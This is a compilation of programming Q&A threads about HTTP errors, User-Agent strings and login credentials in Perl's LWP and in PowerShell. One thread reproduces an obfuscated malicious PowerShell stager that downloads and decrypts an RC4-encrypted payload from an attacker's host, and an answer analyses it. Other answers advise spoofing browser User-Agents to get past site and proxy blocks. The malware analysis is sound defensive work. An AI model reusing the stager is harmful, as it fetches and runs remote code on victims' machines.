HTTP 403 when accessing a URL in Perl

I want to access a webpage, but I'm getting an HTTP 403 failure for this URL.
When I access it using Firefox, it shows HTTP 200 OK.
This is the code I'm using to access it:
my $agent = LWP::UserAgent->new(
    env_proxy  => 1,
    keep_alive => 1,
    timeout    => 30,
    agent      => "Mozilla/5.0",
);
my $request  = HTTP::Request->new(GET => $link);
my $response = $agent->request($request);
if ($response->is_success) {
........

Your code worked fine on my system, accessing one of my own sites. My guess is that the website you're hitting is allergic to automated requests. The user agent string you're sending is very minimal, and the site may reject anything that doesn't look like a real browser. Here is a more genuine agent string:
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24"


Can't connect to ... nodename nor servname provided, or not known

My question: why does my Perl script, which succeeds when run from my home laptop, not work when run on my web host? (Perhaps they have a firewall, for example. Perhaps my website needs to provide credentials. Perhaps this is in the realm of cross-site scripting. I don't know, and I'm appealing for your help in understanding what the cause could be, and then the solution. Thanks!)
Note that everything works fine if I run the Perl script from my laptop at home.
But if I upload the Perl script to my web host, where I have a web page whose JavaScript successfully calls that script, the site whose URL is in the script (finance.yahoo in this example) returns an error.
To bypass the JavaScript, I'm just typing the URL of my Perl script directly, e.g. http://example.com/blah/script.pl
Here is the full error message from finance.yahoo when $url starts with http:
Can't connect to finance.yahoo.com:80 nodename nor servname provided, or not known at C:/Perl/lib/LWP/Protocol/http.pm line 47.
Here is the full error message from finance.yahoo when $url starts with https:
Can't connect to finance.yahoo.com:443 nodename nor servname provided, or not known at C:/Perl/lib/LWP/Protocol/http.pm line 47.
Code:
#!/usr/bin/perl
use strict; use warnings;
use LWP 6; # one site suggested loading this "for all important LWP classes"
use HTTP::Request;
### sample of interest: to scrape historical data and feed massaged facts to my private web page via js ajax
my $url = 'http://finance.yahoo.com/quote/sbux/profile?ltr=1';
my $browser = LWP::UserAgent->new;
# one site suggested having this empty cookie jar could help
$browser->cookie_jar({});
# WAGuess -- another site suggested I should provide these headers
my @ns_headers = (
'User-Agent' =>
# 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Accept' => 'text/html, */*',
'Accept-Charset' => 'iso-8859-1,*,utf-8',
'Accept-Language' => 'en-US',
);
my $response = $browser->get($url, @ns_headers);
# for now, I just want to confirm, in my web page itself, that
# the target web page's contents was returned
my $content = $response->content;
# show such content in my web page
print "Content-type: text/html\n\n" . $content;
Well, it is not obvious what your final goal is, and it is possible that you are overcomplicating the task.
You can retrieve the above-mentioned page with simpler Perl code:
#!/usr/bin/env perl
#
# vim: ai:ts=4:sw=4
#
use strict;
use warnings;
use feature 'say';
use HTTP::Tiny;
my $debug = 1;
my $url = 'https://finance.yahoo.com/quote/sbux/profile?ltr=1';
my $response = HTTP::Tiny->new->get($url);
if ($response->{success}) {
    my $html = $response->{content};
    say $html if $debug;
}
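One caveat, since the URL here uses https: HTTP::Tiny needs IO::Socket::SSL and Net::SSLeay installed to speak TLS, and without them the response comes back with a 599 pseudo-status rather than success. You can check for support up front:
use HTTP::Tiny;
# can_ssl is true if the TLS prerequisites (IO::Socket::SSL, Net::SSLeay)
# are installed; in list context it also returns the reason when they are not.
my ($ok, $why) = HTTP::Tiny->can_ssl;
die "No TLS support: $why" unless $ok;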
In your post you indicated that JavaScript is somehow involved; it is not clear how, or what its purpose is in retrieving the page.
The error message refers to C:/Perl/lib/LWP/Protocol/http.pm line 47, which indicates that the web hosting is taking place on a Windows machine. It would be nice to state that in your question.
Could you shed some light on the purpose of the following block in your code?
# WAGuess
$browser->env_proxy;
# WAGuess
$browser->cookie_jar({});
I do not see the cookie_jar being used anywhere else in your code.
Do you plan to use some authentication approach to extract data under your personal account that is not accessible otherwise?
Please state in the first few sentences what you are trying to achieve on the grand scale.
Perhaps it's about cookies, or about using Yahoo's "query" URL instead.

Where can I set the user agent in Strawberry Perl's config?

We have a proxy server here and all internet traffic goes through it. The command cpan <package> fails with the following error:
LWP failed with code[403] message[Browserblocked]
I think only specific browsers are let through the proxy server, so I need to set the user agent for cpan. Where can I set it? I don't see anything similar in o conf.
Rewriting the code of site\lib\LWP\UserAgent.pm to change
sub _agent { "libwww-perl/$VERSION" }
to
sub _agent { 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0' }
solves the problem, but is this really the official solution?
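I don't know of an official o conf setting for this. For a standalone script, though, the agent string can be set per LWP::UserAgent object rather than by patching the installed module; a minimal sketch (this does not, by itself, change what the cpan client sends):
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;

# Set the User-Agent per object instead of editing LWP/UserAgent.pm.
my $ua = LWP::UserAgent->new(
    agent => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
);
my $response = $ua->get('http://www.cpan.org/');
print $response->status_line, "\n";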

Phishing PowerShell script found

Can someone please help me analyse this code?
[SYstem.NEt.SeRVICEPoiNtMAnagEr]::EXPecT100CONtinue=0;$wC=NEW-ObJECt SYsteM.NEt.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wC.HEADerS.Add('User-Agent',$u);
$wC.PROxY=[SYstem.NEt.WeBReqUest]::DeFaULtWeBPrOxy;
$Wc.PRoXy.CRedEntiALS = [SYSTEM.NET.CReDENTiAlCaCHe]::DEFAULTNETwORkCREdENTIalS;
$Script:Proxy = $wc.Proxy;$K=[SYstem.TeXT.ENcodiNg]::ASCII.GetBYTEs('3c9825ffc1d70f40ec648606c637200d'); $R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}}; $ser='http://colo.myftp.org:4445';$t='/admin/get.php';$wC.HEadeRs.ADD("Cookie","session=R9rR6fhOaMdGNJI1saLgl2JtVSY="); $daTA=$WC.DOWnlOADDATa($SER+$T); $IV=$DATa[0..3];$DaTA=$dATa[4..$dATa.lENGTH];
-JOiN[ChAR[]](& $R $dAta ($IV+$K)) write-host $R
Someone is trying to access my system; I just extracted some code blocks from their application. Please help me analyse this code.
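For what it's worth, the $R script block is a stock RC4 cipher: a key-scheduling loop over 0..255 followed by a keystream loop that XORs each byte, and the script prepends the first four downloaded bytes as an IV to the hard-coded key before decrypting. The surrounding code builds a WebClient with a browser User-Agent and default proxy credentials, then pulls the encrypted payload from http://colo.myftp.org:4445/admin/get.php; this layout is consistent with a PowerShell Empire-style stager. Since the rest of this page is Perl, here is the same decryption logic written out plainly (a sketch for study only; do not contact the attacker's host):
#!/usr/bin/perl
use strict;
use warnings;

# RC4: key-scheduling (KSA) over 0..255, then a keystream (PRGA)
# XORed byte-by-byte with the data -- the same steps as the $R block.
sub rc4 {
    my ($key, $data) = @_;
    my @k = unpack 'C*', $key;
    my @s = 0 .. 255;
    my $j = 0;
    for my $i (0 .. 255) {                      # KSA
        $j = ($j + $s[$i] + $k[$i % @k]) % 256;
        @s[$i, $j] = @s[$j, $i];
    }
    my ($i, $h, $out) = (0, 0, '');
    for my $byte (unpack 'C*', $data) {         # PRGA + XOR
        $i = ($i + 1) % 256;
        $h = ($h + $s[$i]) % 256;
        @s[$i, $h] = @s[$h, $i];
        $out .= chr($byte ^ $s[($s[$i] + $s[$h]) % 256]);
    }
    return $out;
}

# The stager strips a 4-byte IV off the download and uses IV . key,
# i.e. plaintext = rc4($iv . $key, $ciphertext).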

LWP::UserAgent and login credentials

I'm trying to set up the credentials with LWP::UserAgent, but I'm not able to log in. $username and $passwd are correct. I don't understand what I should put in the third argument (according to the docs, $realm; here "Authentication"). Here is the snippet:
my $browser = LWP::UserAgent->new(
    agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/31.2.0',
);
$browser->credentials("domain.com:80", "Authentication", $username, $passwd);
my $response = $browser->get("http://domain.com/page");
print $response->content;
I corrected the realm as @ThisSuitIsBlackNot suggested:
Close your browser and reopen it. Navigate to http://domain.com/page.
If the site is using basic authentication,
you should get a popup that says something like
A username and password are being requested by
http://domain.com. The site says: "foo bar".
In this case, foo bar is the realm.
Then I was able to log in, but the pages were empty.
So I added a cookie jar:
$browser->cookie_jar({ file => ".mycookies.txt" });
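Putting those pieces together, a minimal end-to-end sketch (the host, realm, and credentials are placeholders for your own values):
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;

my ($username, $passwd) = ('user', 'secret');    # placeholders

my $browser = LWP::UserAgent->new(
    agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/31.2.0',
);

# host:port plus the realm string exactly as the login popup reports it
$browser->credentials('domain.com:80', 'foo bar', $username, $passwd);

# keep session cookies across requests (autosave writes them back to disk)
$browser->cookie_jar({ file => '.mycookies.txt', autosave => 1 });

my $response = $browser->get('http://domain.com/page');
print $response->is_success ? $response->content : $response->status_line;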

PowerShell: DownloadFile 404 but site exists

I'm having a little problem that looks very simple... but I just don't get it!
I'm trying to download the website content of http://cspsp.gshi.org/ (if you try to access it via www.cspsp.gshi.org you get the wrong page).
For this I do the following in PowerShell:
(New-Object System.Net.WebClient).DownloadFile( 'http://cspsp.gshi.org/', 'save.htm' )
I can access the website with Firefox and download its contents easily, but PowerShell always outputs something like:
The remote server returned an error: (404) Not Found. (translated from German)
I'm not sure what I'm doing wrong here. Other websites like Google work fine.
It appears that the site relies on the User-Agent request header being sent by HTTP clients, and that System.Net.WebClient doesn't send even a default value (at least, it didn't when I hit my own local servers).
Either way, this worked for me:
$client = New-Object System.Net.WebClient
$client.Headers['User-Agent'] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.40 Safari/537.17"
$client.DownloadFile('http://cspsp.gshi.org/', 'saved.html')
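For comparison with the Perl threads above, the same fix in LWP terms (a sketch; the UA string is just the one from the PowerShell answer):
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;

# Same idea: supply a browser-like User-Agent, then save the body to a file.
my $ua = LWP::UserAgent->new(
    agent => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.40 Safari/537.17',
);
my $response = $ua->get('http://cspsp.gshi.org/');
die $response->status_line unless $response->is_success;

open my $fh, '>:raw', 'saved.html' or die "saved.html: $!";
print {$fh} $response->content;    # raw bytes, as DownloadFile would save them
close $fh;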